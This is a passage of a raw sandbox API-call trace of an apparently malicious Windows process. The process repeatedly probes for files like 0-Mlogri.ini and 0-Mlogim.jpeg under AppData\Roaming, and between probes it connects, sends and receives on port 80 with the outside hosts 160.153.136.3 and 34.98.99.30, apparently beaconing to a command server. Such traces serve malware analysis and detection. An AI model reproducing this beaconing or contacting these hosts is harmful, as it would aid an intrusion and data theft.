IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.507] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.507] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.507] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.507] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.507] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.507] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.507] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.507] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.507] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.507] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.507] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.507] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.507] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.507] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.507] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.507] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.507] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0228.508] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.508] socket (af=2, type=1, protocol=6) returned 0x2e4 [0228.508] connect (s=0x2e4, name=0x70ace50*(sa_family=2, sin_port=0x50, sin_addr="160.153.136.3"), namelen=16) returned 0 [0228.528] send (s=0x2e4, buf=0x25a505a*, len=180, flags=0) returned 180 [0228.529] setsockopt (s=0x2e4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0228.529] recv (in: s=0x2e4, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 47 [0228.565] closesocket (s=0x2e4) returned 0 [0228.566] Sleep (dwMilliseconds=0x7d0) [0228.579] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.579] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.580] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0228.580] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.580] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.580] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.580] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.580] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.580] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.580] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.580] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.580] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.580] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.580] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.581] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.581] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.581] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.581] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.581] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.581] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.581] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.581] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.581] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.581] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.581] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.581] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.581] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.581] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.581] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.581] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.581] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.581] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.581] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.581] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.582] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.582] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.582] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.582] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.582] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.582] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.582] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.582] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.582] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0228.582] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.582] Sleep (dwMilliseconds=0x7d0) [0228.590] Sleep (dwMilliseconds=0x7d0) [0228.606] Sleep (dwMilliseconds=0x7d0) [0228.623] Sleep (dwMilliseconds=0x7d0) [0228.643] Sleep (dwMilliseconds=0x7d0) [0228.653] Sleep (dwMilliseconds=0x7d0) [0228.668] Sleep (dwMilliseconds=0x7d0) [0228.684] Sleep (dwMilliseconds=0x7d0) [0228.699] Sleep (dwMilliseconds=0x7d0) [0228.715] Sleep (dwMilliseconds=0x7d0) [0228.747] Sleep (dwMilliseconds=0x7d0) [0228.762] Sleep (dwMilliseconds=0x7d0) [0228.777] Sleep (dwMilliseconds=0x7d0) [0228.793] Sleep (dwMilliseconds=0x7d0) [0228.808] Sleep (dwMilliseconds=0x7d0) [0228.829] Sleep (dwMilliseconds=0x7d0) [0228.840] Sleep (dwMilliseconds=0x7d0) [0228.858] Sleep (dwMilliseconds=0x7d0) [0228.871] Sleep (dwMilliseconds=0x7d0) [0228.890] Sleep (dwMilliseconds=0x7d0) [0228.902] Sleep (dwMilliseconds=0x7d0) [0228.918] Sleep (dwMilliseconds=0x7d0) [0228.933] socket (af=2, type=1, protocol=6) returned 0x2e4 [0228.934] connect (s=0x2e4, name=0x70acf70*(sa_family=2, sin_port=0x50, sin_addr="34.98.99.30"), namelen=16) returned 0 [0228.961] send (s=0x2e4, buf=0x25a505a*, len=177, flags=0) returned 177 [0228.962] setsockopt (s=0x2e4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0228.962] recv (in: s=0x2e4, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 461 [0229.157] closesocket (s=0x2e4) returned 0 [0229.157] Sleep (dwMilliseconds=0x7d0) [0229.170] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.170] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.191] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0229.191] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.191] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.191] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.191] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.191] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.191] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.191] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.191] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.191] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.191] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.191] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0229.191] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0229.192] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0229.192] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0229.192] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), 